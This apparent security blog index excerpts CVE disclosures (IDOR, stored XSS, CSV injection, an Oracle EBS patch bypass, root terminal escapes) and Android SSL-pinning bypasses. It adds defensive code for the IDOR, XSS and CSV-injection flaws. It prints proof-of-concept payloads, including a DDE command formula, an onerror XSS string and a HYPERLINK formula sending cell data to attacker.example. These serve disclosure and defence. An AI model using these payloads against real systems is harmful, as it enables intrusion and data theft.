Posts

Fixing Frida Server “TypeError: t is not a function” on Android

Hi All, recently I faced an issue running Frida on Android. When using Frida for Android reverse engineering or runtime instrumentation, you might encounter this frustrating error immediately after starting the Frida server binary:

    # /data/local/tmp/frida &

And then suddenly:

    {"type":"error","description":"TypeError: t is not a function"}
    ...
    {"type":"error","description":"TypeError: Cannot read properties of undefined (reading 'find')"}

Root Cause: Google ART Runtime Module. Android devices using com.google.android.art (a system module version of ART) can conflict with how Frida's agent initializes. The module interferes with native libart.so loading, class resolution, or reflection APIs, which Frida relies on to set up its Java bridge. Even before you attach to an app, Frida attempts to bootstrap into the ART layer, and this is where the failure happens. Fix ...

Bypassing Patches for "CVE-2022-21500" on Oracle EBS (IDORing Oracle) (CVE-2025-30707, CVE-2025-30708)

Hello Readers, (sorry for the lengthy article) In 2022, researcher Orwa Atyat discovered a critical vulnerability (CVE-2022-21500) in Oracle E-Business Suite, allowing attackers to register accounts, access the "Manage Proxy" page, and retrieve sensitive user data. Additionally, the Diagnostic Console could be abused to run SQL queries and extract passwords. To address this, Oracle released patches and organizations implemented workarounds such as:

Identity Gateways – Redirecting login attempts through solutions like Oracle IDCS or ForgeRock.
Disabling Registration – Removing self-registration links or URLs (ibeCAcpSSOReg.jsp) to prevent account creation.
Hiding Settings – Removing access to the "Manage Proxy" option from the UI.
Blocking Access – Disabling the "Manage Proxy" page entirely.

Despite these measures, I successfully bypassed all four controls. Oracle acknowledged two of my findings (here) and assigned the following new CVEs: CVE-2025-30707 – Oracle iStore (12.2.3–12.2...

Enjay CRM 1.0 - Multiple code executions via Unrestricted Terminal

Enjay CRM is a bundle that contains the CRM software along with Ubuntu Linux; however, a normal user doesn't have access to the underlying OS. Once the OS boots it runs the Enjay CRM software, which has multiple read-only options. However, some of these options open a terminal to perform a specific activity. This terminal is unrestricted, and the user can access the underlying OS as ROOT and run any command on it. The underlying OS can be accessed using two methods; CVEs have been assigned to both findings.

1. Using the Ping menu (CVE-2024-41308): it opens a terminal; the user can click on File menu -> New Tab/New Window, and a root-level terminal opens.
2. Using Hardware info (CVE-2024-41309): once the Hardware info page opens, click on the Help menu and select either "Open HardInfo Website" or "Report bug"; this opens an unrestricted terminal where the user can click on File menu -> New Tab/New Window, and a root-level terminal opens.

Both the vulner...

GRANDING UTime Master - CSV Injection

Hi All, I was able to identify a CSV Injection vulnerability in an online attendance system, GRANDING UTime Master (v UTime Master_9.0.7-Build:Apr 4,2023). UTime Master is a powerful web-based time and attendance management software that provides a stable connection to GRANDING's standalone push communication devices by Ethernet/Wi-Fi/GPRS/3G and works as a private cloud to offer employee self-service by mobile application and web browser.

Login to UTime Master using the admin account. Click on Personnel > Employee Management > Employee. Select any employee or create a new employee. In the First Name section embed your payload; for the test case I used "=cmd|' /C notepad'!'A1'" (a CSV payload embedded in the EMP NAME field). Once submitted, the CSV payload is visible in the First Name field. Click on the Export button and then on CSV Export; the CSV payload is now embedded in the EMP NAME column of the export. Open the exported file and the payload executes successfully. I have also observed mul...

GRANDING UTime Master - IDOR (CVE-2023-45393)

Hi All, I was able to identify an IDOR vulnerability in an online attendance system, GRANDING UTime Master (v UTime Master_9.0.7-Build:Apr 4,2023). CVE ID: CVE-2023-45393. UTime Master is a powerful web-based time and attendance management software that provides a stable connection to GRANDING's standalone push communication devices by Ethernet/Wi-Fi/GPRS/3G and works as a private cloud to offer employee self-service by mobile application and web browser. Using the IDOR, any user of the application can fetch logs which are meant to be accessible to administrators only. These logs also contain sensitive information such as the user password that employees use to record attendance.

Login to UTime Master using any account. Capture the request in Burp Suite with the valid cookies. Modify the URL to "/base/adminlog/table/?page=1&limit=200". Forward the request and it will fetch all the admin logs. The IDOR has been fixed in latest versions after 9.0.7-Build:A...
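
An added example, not part of the post or of UTime Master: a small local stand-in for the admin-log endpoint, one variant with only a login check (the IDOR) and one that also checks the caller's role, plus the client request the post describes, so the same check can be pointed at a real target with its own base URL and session cookie. The session cookie values, log rows and role names are all constructed here.

```python
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

# Constructed session store (cookie value -> session); names are hypothetical.
SESSIONS = {
    "admin-session": {"user": "admin", "role": "admin"},
    "emp-session": {"user": "employee1", "role": "employee"},
}
# Constructed admin-log rows standing in for the real table, which the post
# says includes the passwords employees use to record attendance.
ADMIN_LOGS = [
    {"id": 1, "user": "admin", "action": "set attendance password", "detail": "REDACTED"},
    {"id": 2, "user": "admin", "action": "login", "detail": "ok"},
]
ADMINLOG_PATH = "/base/adminlog/table/"
# Opener that ignores proxy environment variables so 127.0.0.1 is reached directly.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def make_handler(enforce_role):
    """Build a request handler; enforce_role=False reproduces the IDOR."""

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            session = SESSIONS.get(self.headers.get("Cookie", ""))
            if session is None:
                self._send(401, {"error": "login required"})
            elif urlparse(self.path).path != ADMINLOG_PATH:
                self._send(404, {"error": "not found"})
            elif enforce_role and session["role"] != "admin":
                # The missing check: being logged in is not the same as being allowed.
                self._send(403, {"error": "forbidden"})
            else:
                self._send(200, {"data": ADMIN_LOGS, "count": len(ADMIN_LOGS)})

        def _send(self, status, payload):
            body = json.dumps(payload).encode()
            self.send_response(status)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):  # silence per-request logging
            pass

    return Handler


def start_server(enforce_role):
    """Start a local stand-in server on an ephemeral port -> (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), make_handler(enforce_role))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


def fetch_adminlog(base_url, cookie, page=1, limit=200):
    """Replay the request from the post with the given session cookie."""
    req = urllib.request.Request(
        "%s%s?page=%d&limit=%d" % (base_url, ADMINLOG_PATH, page, limit),
        headers={"Cookie": cookie},
    )
    try:
        with OPENER.open(req, timeout=5) as resp:
            return resp.status, json.loads(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, json.loads(err.read() or b"{}")


def is_idor(base_url, low_priv_cookie):
    """True when a non-admin session is handed admin-log rows."""
    status, body = fetch_adminlog(base_url, low_priv_cookie)
    return status == 200 and bool(body.get("data"))


if __name__ == "__main__":
    for enforce in (False, True):
        server, url = start_server(enforce)
        verdict = "VULNERABLE" if is_idor(url, "emp-session") else "ok"
        print("role check %s: %s" % ("on" if enforce else "off", verdict))
        server.shutdown()
```

Against a real target, call fetch_adminlog with the employee's cookie and the admin's cookie and compare: the finding is not that the endpoint exists but that both responses carry the same rows.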

GRANDING UTime Master - Stored XSS (CVE-2023-45391)

Hi All, I was able to identify stored XSS in an online attendance system, GRANDING UTime Master (v UTime Master_9.0.7-Build:Apr 4,2023). CVE ID: CVE-2023-45391. UTime Master is a powerful web-based time and attendance management software that provides a stable connection to GRANDING's standalone push communication devices by Ethernet/Wi-Fi/GPRS/3G and works as a private cloud to offer employee self-service by mobile application and web browser.

Login to UTime Master using the admin account. Click on Personnel > Employee Management > Employee. Select any employee or create a new employee. In the First Name section embed your payload; for the test case I used "/><img src=a onerror=alert(22)> (an XSS payload embedded in the EMP NAME field). Save the employee details; once the page refreshes it executes your payload. Our payload executed successfully. I have also observed that multiple other fields are vulnerable to XSS, e.g. Device Name, Department, etc. XSS has be...

CSV injection in Avaya Call Management System (CMS). CVE-2023-3527

Hi All, I was able to identify a CSV injection vulnerability in Avaya Call Management System (CMS). Avaya CMS is an integrated analysis and reporting solution that keeps you in touch with virtually everything that's going on in your contact center, from evaluating the performance of a single agent or group of agents to managing a contact center with multiple locations worldwide. During the security assessment of the CMS Supervisor web application, I noted that the whole "Administration" section has a feature to download its content in CSV format. Any malicious user can inject a CSV payload, which will be executed if the admin downloads the CSV report and opens it. Excel will ask the admin to enable the content; since the report was downloaded from a trusted source, the admin clicks Enable, which executes the content.

Vulnerability and Fix:
Vulnerability Name: CMS is vulnerable to CSV Injection
Assigned CVE: CVE-2023-3527
ASA Num...

ZKT Eco ADMS - Stored XSS (CVE-2022-44213)

Hi All, I was able to identify stored XSS in an online attendance system, ZKT Eco ADMS (v 3.1-164). ADMS (Automatic Data Master Server) is a powerful web-based time and attendance management software used to configure the attendance devices and manage their users. CVE ID assigned: CVE-2022-44213: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44213

Technical details: Login to ZKT Eco ADMS (default admin/admin). Click on System and then on Employee. Click on the Append button to add a new employee. In the Emp Name field add your XSS payload; for testing I used the non-malicious "/><img src=a onerror=alert('stored-XSS');>. Click on the Submit button; it redirects you to the employee list, and the payload embedded in the EMP NAME field executes successfully. XSS has been fixed in the latest versions after 3.1-164.
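
The two stored XSS posts above (UTime Master and ZKT Eco ADMS) use the same attribute-breakout payload in an employee name field. The Python below is an added example, not code from either post or vendor: it renders an employee name into a table cell and an input value the way such a list page would, once unescaped and once through html.escape with quote=True, then uses the standard-library HTML parser to count the on* event handlers that would reach the browser. The row template and the payload copies are constructed here.

```python
import html
from html.parser import HTMLParser

# Constructed copies of the payloads from the two posts.
PAYLOADS = [
    '"/><img src=a onerror=alert(22)>',
    '"/><img src=a onerror=alert(\'stored-XSS\');>',
]

# Hypothetical employee-list row: the name lands in a text node and in a
# double-quoted attribute, the two contexts the payload is built to escape.
ROW_TEMPLATE = (
    '<tr><td>{name}</td>'
    '<td><input type="text" name="emp_name" value="{name}"></td></tr>'
)


def render_row_vulnerable(name: str) -> str:
    """Interpolates the stored value verbatim: the leading quote closes the
    value="" attribute and the /> closes the tag, so <img ...> is parsed as
    markup in both positions."""
    return ROW_TEMPLATE.format(name=name)


def render_row_fixed(name: str) -> str:
    """html.escape(quote=True) encodes & < > " and ', which is sufficient for
    a text node and for a quoted attribute (not for JS or URL contexts)."""
    return ROW_TEMPLATE.format(name=html.escape(name, quote=True))


class EventHandlerFinder(HTMLParser):
    """Collects every element carrying an on* attribute, i.e. script that a
    browser would run while parsing the page, without executing anything."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        handlers = [(k, v) for k, v in attrs if k.lower().startswith("on")]
        if handlers:
            self.findings.append((tag, handlers))


def injected_handlers(markup: str):
    """Return [(tag, [(attr, value), ...]), ...] for injected event handlers."""
    finder = EventHandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for payload in PAYLOADS:
        print("vulnerable:", injected_handlers(render_row_vulnerable(payload)))
        print("fixed     :", injected_handlers(render_row_fixed(payload)))
```

The parser check is what you would run over a saved copy of the employee list after submitting the payload: a non-empty result means the stored value reached the page as markup, whether or not the alert fired in the browser you happened to use.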

NXLog Convert windows Hostname to Host-IP in the logs

Hi all, recently I faced an issue where I was sending Windows logs to my log collector; however, the logs were sent in the following format: Timestamp, System Hostname, Event-ID, etc. To resolve the hostname to an IP address the collector needed access to a local DNS server, but there was no local DNS :-P So there are two solutions:

Create a local DNS server, add entries for all the hosts, and point the log collector to this local DNS.
Find a workaround to be implemented on all the servers so that each converts its hostname to its local IP before forwarding the logs to the collector.

After googling for around 4-5 hours I wasn't able to find a proper solution; every solution I read converted IP to hostname, not the other way round. So I started reading the NXLog documentation and found a core function which can be used to convert the hostname to the host IP. Let's assume you have already configured the INPUT entity in the NXLog config file and you know which logs to be co...
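
The post's continuation is cut off above, so the configuration below is an added example rather than the author's own. It assumes the core function meant is NXLog's host_ip(), documented as returning the first non-loopback IP address the local hostname resolves to, and it assumes the im_msvistalog input for Windows event logs and a collector at an example address.

```conf
# Added example, not the post's config. Assumes NXLog's host_ip() core function.
<Input eventlog>
    Module      im_msvistalog
    # im_msvistalog fills $Hostname with the machine name. Keep a copy, then
    # overwrite it with the local IP so the collector never needs to resolve it.
    Exec        $OrigHostname = $Hostname;
    Exec        $Hostname = host_ip();
</Input>

<Output collector>
    Module      om_tcp
    Host        192.0.2.10      # collector address (assumed, RFC 5737 example range)
    Port        514
</Output>

<Route eventlog_to_collector>
    Path        eventlog => collector
</Route>
```

host_ip() takes an optional index argument for hosts with several addresses; check which interface it picks on a multi-homed server before rolling the change out to all of them.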

ZKBio Time - CSV Injection (CVE-2022-40472)

Hi all, I am here with a new post. Recently I identified a CSV injection vulnerability in a web-based time and attendance management software. Below are the details:

Software Description: ZKBio Time is a powerful web-based time and attendance management software. With a powerful data handling capacity, the system can manage the attendance data of 10,000 employees. It can easily handle hundreds of devices and thousands of employees and their transactions. ZKBio Time comes with an intuitive user interface, is able to manage timetables, shifts and schedules, and can easily generate attendance reports.
Impacted Version: 8.0.7 (Build: 20220721.14829) and before.
CVE ID: CVE-2022-40472

Vulnerability details: Login to the ZKBio Time application. In the left menu click on Messages -> Public. Click on the ADD new message button. Write your device serial number, mention any date/time and duration, and in the Content field add your CSV injection payload, as shown below. Any user who extract th...

Python Not Showing Colors in Windows 10

Hi All, today I was testing an exploit, but on Windows it was not showing colors, which was very annoying. I tried to install colorama and termcolor; however, nothing worked, and the exploit was still printing the raw ASCII escape codes instead of colors, as shown below. After a lot of searching I was able to fix it; it requires a little modification of the exploit.

1st, make sure to install colorama and termcolor.

For Python 2.7.x:

    pip install colorama
    pip install termcolor

For Python 3.x:

    pip3 install colorama
    pip3 install termcolor

Next, open the file in Notepad or any other editor and add the lines below at the start of the script:

    import os
    os.system("")

Save the script and re-run it; it will start showing the colors. Thanks
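
Why the two-line trick works, as an added example that is not from the post: a Windows 10 console only interprets ESC[...m sequences once the ENABLE_VIRTUAL_TERMINAL_PROCESSING flag is set on its output handle, and spawning an empty cmd.exe through os.system("") happens to leave the console in that mode. The module below sets the flag deliberately with SetConsoleMode, keeps os.system("") only as a fallback, and adds the check most exploit scripts forget: when stdout is a file or a pipe, emit plain text instead of escape codes.

```python
import os
import re
import sys

ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x0004  # from wincon.h
STD_OUTPUT_HANDLE = -11
ANSI_RE = re.compile(r"\x1b\[[0-9;]*m")


def enable_vt_mode() -> bool:
    """Make the console interpret ANSI colour sequences; True on success.

    On Windows this sets ENABLE_VIRTUAL_TERMINAL_PROCESSING on stdout via
    SetConsoleMode, the same state os.system("") reaches as a side effect.
    On other platforms the terminal already understands the sequences.
    """
    if sys.platform != "win32":
        return True
    import ctypes
    kernel32 = ctypes.windll.kernel32
    # Declare the handle type explicitly: the ctypes default (c_int) can
    # truncate a 64-bit HANDLE value.
    kernel32.GetStdHandle.restype = ctypes.c_void_p
    kernel32.GetConsoleMode.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_uint32)]
    kernel32.SetConsoleMode.argtypes = [ctypes.c_void_p, ctypes.c_uint32]
    handle = kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
    mode = ctypes.c_uint32()
    if not kernel32.GetConsoleMode(handle, ctypes.byref(mode)):
        return False  # stdout is not a console (redirected to a file or pipe)
    if kernel32.SetConsoleMode(handle, mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING):
        return True
    # Fall back to the trick from the post and re-read the mode to confirm.
    os.system("")
    return bool(kernel32.GetConsoleMode(handle, ctypes.byref(mode))
                and mode.value & ENABLE_VIRTUAL_TERMINAL_PROCESSING)


def colorize(text: str, code: int) -> str:
    """Wrap text in an SGR colour code (31 red, 32 green, 33 yellow, ...)."""
    return "\x1b[%dm%s\x1b[0m" % (code, text)


def strip_ansi(text: str) -> str:
    """Remove SGR sequences from text that is going to a log file."""
    return ANSI_RE.sub("", text)


def paint(text: str, code: int, is_tty=None) -> str:
    """Colour the text only when it is headed for a terminal that can render
    it; otherwise return it plain rather than writing raw escape codes."""
    if is_tty is None:
        is_tty = sys.stdout.isatty()
    if is_tty and enable_vt_mode():
        return colorize(text, code)
    return text


if __name__ == "__main__":
    print(paint("[+] exploit succeeded", 32))
    print(paint("[-] target not vulnerable", 31))
```

colorama's init() does the same handle work internally on current versions; the explicit version is useful when a script must keep working without third-party packages.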

CSV Injection in Acunetix version 13.0.201217092 (CVE-2022-29315 )

Hi all, I was using Acunetix version 13.0.201217092 for scanning purposes back in Jan 2021, and I was able to identify a CSV Injection vulnerability in the web scanner. Any user who is not the administrator can perform these actions, which can lead to compromise of the admin's system. For testing I used the Admin account. Let's get to the technical details.

CVE ID Assigned: CVE-2022-29315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29315
https://www.cve.org/CVERecord?id=CVE-2022-29315
Vulnerable Version: Before version 14
Fixed Version: 14 and later

# Software description: Acunetix by Invicti Security is an application security testing tool built to help small and mid-size organizations around the world take control of their web security.

# Technical Details & Impact: It was observed that the Target page is vulnerable to CSV Injection. Using CSV injection, maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting...
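
The four CSV injection posts on this page (UTime Master, Avaya CMS, ZKBio Time and this one) all come down to the same defect: a cell that starts with a formula character is written into an export unchanged. The Python below is an added example, not code from any of those products or from the posts. It classifies cells as text, formula, or the DDE shape used in the UTime Master payload, shows an unsafe export beside a hardened one that neutralizes formula-like cells and quotes every field, and gives a scanner you can run over any CSV an application hands you. The employee rows are constructed.

```python
import csv
import io
import re

# Leading characters that make Excel / LibreOffice evaluate a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
# Plain numbers ("-5", "+3.25") start with a trigger but are harmless.
NUMBER_RE = re.compile(r"^[+-]?\d+(\.\d+)?$")
# DDE shape, as in =cmd|' /C notepad'!'A1': server|topic!item.
DDE_RE = re.compile(r"^[=+\-@]\s*\w+\s*\|.*!")


def is_formula(cell: str) -> bool:
    """True if a spreadsheet would evaluate this cell rather than display it."""
    value = cell.lstrip(" ")
    if NUMBER_RE.match(value):
        return False
    return value.startswith(FORMULA_TRIGGERS)


def classify(cell: str) -> str:
    """'text', 'formula' (e.g. =HYPERLINK, @SUM) or 'dde' (command execution)."""
    if not is_formula(cell):
        return "text"
    return "dde" if DDE_RE.match(cell.lstrip(" ")) else "formula"


def neutralize(cell: str) -> str:
    """Prefix formula-like cells with a single quote so the spreadsheet keeps
    them as literal text (the quote shows only in the formula bar)."""
    return "'" + cell if is_formula(cell) else cell


def export_csv_unsafe(headers, rows) -> str:
    """What the vulnerable products do: values go out exactly as stored."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(headers)
    writer.writerows(rows)
    return buf.getvalue()


def export_csv(headers, rows) -> str:
    """Hardened export: neutralize every cell and quote every field, so an
    embedded comma, quote or newline cannot create extra cells either."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(headers)
    for row in rows:
        writer.writerow([neutralize(str(cell)) for cell in row])
    return buf.getvalue()


def scan_csv(text: str):
    """Audit an existing export: (row, column, value, kind) for every cell a
    spreadsheet would evaluate. An empty list means the file is clean."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            kind = classify(cell)
            if kind != "text":
                findings.append((r, c, cell, kind))
    return findings


# Constructed employee rows: the first name is the DDE payload from the
# UTime Master post; the others are the usual formula variants.
EMPLOYEES = [
    ("=cmd|' /C notepad'!'A1'", "Engineering", -5),
    ('=HYPERLINK("http://attacker.example/?"&A1,"click")', "Sales", 12),
    ("@SUM(1,2)", "HR", 3),
    ("Alice", "Engineering", 7),
]
HEADERS = ["name", "dept", "days"]

if __name__ == "__main__":
    print("unsafe export:", scan_csv(export_csv_unsafe(HEADERS, EMPLOYEES)))
    print("hardened export:", scan_csv(export_csv(HEADERS, EMPLOYEES)))
```

The single-quote prefix is the usual mitigation because it survives a round trip through Excel and LibreOffice; the alternative of stripping the leading characters silently changes user data and still leaves the tab and carriage-return cases.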

SSL Pinning Bypass trick PT2 (Forcing APK Accept CA Certificate)

So as discussed in Part 1, 1APP has implemented another trick to prevent SSL pinning bypass. Before, they were relying on the CA certificates present on the device, which we were able to bypass by putting our Burp Suite certificate in the CA directory. After the update, the old trick was no longer working. To understand the implemented fix, I decompiled the APK again, and in the "resources\res\xml" directory I checked "network_security_config.xml". After reviewing the XML file I saw a new entry like:

    <trust-anchors>
        <certificates src="@raw/myAPP"/>
    </trust-anchors>

This means that they have embedded their own certificate in the "\resources\res\raw" directory under the name "myAPP", which means that the application will not accept any certificate (CA/system or user) from the device; it will only use the myAPP certificate embedded in the APK. I have tried multiple attempts to bypass it; however, every time I manipulate the APK file and tri...

SSL Pinning Bypass Trick PT1(Copying Burp certificate to CA Directory)

Hi everyone, as you are aware I update this blog when I get stuck in some situation and, after multiple attempts, get past it; then I write a blog about it. So today we will be discussing the issues I faced while bypassing SSL pinning in one application; let's call it 1APP. 1APP is configured in such a way that simply installing the Burp Suite certificate in Android was not working. Running the application with the normal Burp certificate gave an error like "java.security.cert.CertPathValidatorException" (webhook etc.). After decompiling the app using online tools (or you can use APKTOOL), in the "resources\res\xml" directory I checked "network_security_config.xml"; after reviewing the XML file it was clear the application only trusts certificates installed in the CA directory of the device. So it was clear that we have to copy our certificate to the Android CA directory. After a lot of searching I came across an awesome article where he explaine...
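
Both pinning posts start from the same step: reading network_security_config.xml out of the decoded APK. The Python below is an added example, not the author's script: it parses that file with the standard library and reports, per base-config / domain-config / debug-overrides scope, which certificate sources are trusted, whether pins apply and whether a source is allowed to override them, then states what that means for an interception proxy. The two sample configs are constructed to match the two posts (the device CA store in Part 1; only a bundled @raw/myAPP certificate in Part 2); the domain name and pin digest are placeholders.

```python
import xml.etree.ElementTree as ET

SCOPES = ("base-config", "domain-config", "debug-overrides")


def trust_summary(xml_text: str) -> dict:
    """Map each config scope to the certificate sources and pins it declares.

    domain-config entries are keyed by their domain list so nested and
    repeated blocks stay distinguishable.
    """
    root = ET.fromstring(xml_text)
    summary = {}
    for scope in root.iter():
        if scope.tag not in SCOPES:
            continue
        name = scope.tag
        if scope.tag == "domain-config":
            domains = [d.text.strip() for d in scope.findall("domain")]
            name = "domain-config:" + ",".join(domains)
        summary[name] = {
            # (src, overridePins): src is system, user or @raw/<resource>
            "anchors": [(c.get("src"), c.get("overridePins") == "true")
                        for c in scope.findall("trust-anchors/certificates")],
            "pins": [p.get("digest") for p in scope.findall("pin-set/pin")],
            "cleartext": scope.get("cleartextTrafficPermitted"),
        }
    return summary


def interception_notes(summary: dict) -> dict:
    """Per scope, what an interception proxy needs given the trust anchors."""
    notes = {}
    for scope, info in summary.items():
        sources = [src for src, _ in info["anchors"]]
        if not sources:
            note = "no trust-anchors in this scope: inherits base-config (system CAs by default on API 24+)"
        elif "user" in sources:
            note = "user CAs trusted: installing the proxy CA as a user certificate is enough"
        elif "system" in sources:
            note = "system CAs only: the proxy CA must go into the device CA directory"
        else:
            note = "only bundled certificate(s) %s trusted: a device CA alone will not work" % ", ".join(sources)
        if info["pins"]:
            overriding = [src for src, ov in info["anchors"] if ov]
            if overriding:
                note += "; pins present but overridden for %s" % ", ".join(overriding)
            else:
                note += "; %d pin(s) also apply" % len(info["pins"])
        notes[scope] = note
    return notes


# Constructed sample matching Part 1: only the device CA store is trusted.
NSC_DEVICE_CAS = """<network-security-config>
  <base-config>
    <trust-anchors>
      <certificates src="system"/>
    </trust-anchors>
  </base-config>
</network-security-config>"""

# Constructed sample matching Part 2: only a certificate bundled in res/raw,
# plus a pinned domain (hypothetical name and digest).
NSC_BUNDLED_ONLY = """<network-security-config>
  <base-config>
    <trust-anchors>
      <certificates src="@raw/myAPP"/>
    </trust-anchors>
  </base-config>
  <domain-config>
    <domain includeSubdomains="true">api.example.com</domain>
    <pin-set>
      <pin digest="SHA-256">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=</pin>
    </pin-set>
  </domain-config>
</network-security-config>"""

if __name__ == "__main__":
    for label, xml_text in (("part 1", NSC_DEVICE_CAS), ("part 2", NSC_BUNDLED_ONLY)):
        for scope, note in interception_notes(trust_summary(xml_text)).items():
            print("%s / %s: %s" % (label, scope, note))
```

Run it on the decoded APK's res/xml/network_security_config.xml before spending time on a proxy certificate: the file tells you up front whether a user CA, a system CA, or neither will be accepted.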